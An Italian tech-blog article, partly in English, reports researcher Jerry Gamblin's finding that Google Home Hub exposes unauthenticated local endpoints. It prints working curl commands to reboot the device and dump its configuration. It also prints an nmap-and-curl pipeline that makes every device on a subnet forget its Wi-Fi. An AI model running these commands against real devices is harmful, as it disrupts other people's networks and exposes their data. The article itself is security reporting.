Dimensione carattere: +
2 minuti di lettura (429 parole)

Google Home Hub non è sicuro

HOME_google_hardware_event_2018_001
Il garante della sicurezza Jerry Gamblin ha pubblicato una serie di istruzioni - essenzialmente linee di base di XML - che possono facilmente estrarre informazioni importanti dall'hub di Google Home e, in alcuni casi, bloccare temporaneamente il dispositivo.

L'Home Hub, che è essenzialmente un tablet Android collegato a un altoparlante, è progettato per fungere da Assistente Google in camera. Ciò significa che si connette al Wi-Fi (e consente di vedere punti di accesso Wi-Fi aperti vicino al dispositivo), riceve video e foto da altri dispositivi (e trasmette il suo pin) e accetta i comandi da remoto (incluso un rapido riavvio tramite il riga di comando).

Il comando, che consiste in una semplice chiamata URL tramite la riga di comando, è chiaramente parte del processo di configurazione. Puoi provare questo a casa se sostituisci "hub" con l'indirizzo IP locale dell'Hub Home.

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

​Altri one-liner espongono ulteriori dati, incluso un certo numero di micro servizi:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "192.168.1.1",
"locale": "en-US",
"location": {
"country_code": "US",
"latitude": 255,
"longitude": 255
},
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"opencast": true,
"stats": true
},
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
},
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10
}

Infine, questa linea fa sì che tutti i dispositivi sulla rete dimentichino il loro Wi-Fi, costringendo a rientrare nel processo di configurazione.

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren't showstoppers but they are very alarming. Allowing unauthenticated access to these services is lazy at best and dangerous at worst. He also notes that these endpoints have been open for years on various Google devices, which means this is a regular part of the code base and not considered an exploit by Google.

Again, nothing here is mission critical – no Home Hub will ever save my life – but it would be nice to know that devices based on the platform have some modicum of security, even in the form of authentication or obfuscation. Today we can reboot Grandpa's overcomplicated picture frame with a single line of code but tomorrow we may be able to reboot Grandpa's oxygen concentrator.

loading...
×
Stay Informed

When you subscribe to the blog, we will send you an e-mail when there are new updates on the site so you wouldn't miss them.

Zuckerberg riceve una convocazione congiunta dai p...
Apple annuncia l'aggiornamento di WatchOS 4.1 ma l...
 

By accepting you will be accessing a service provided by a third-party external to http://imperoweb.it/

loading...

Sections

Prodotti

Partner

Consigliati

Azienda

Seguici Sui Social

X

Impero Web Copyright Abilitato

Non è ammessa nessuna copia i contenuti sono protetti da diritti d'autore.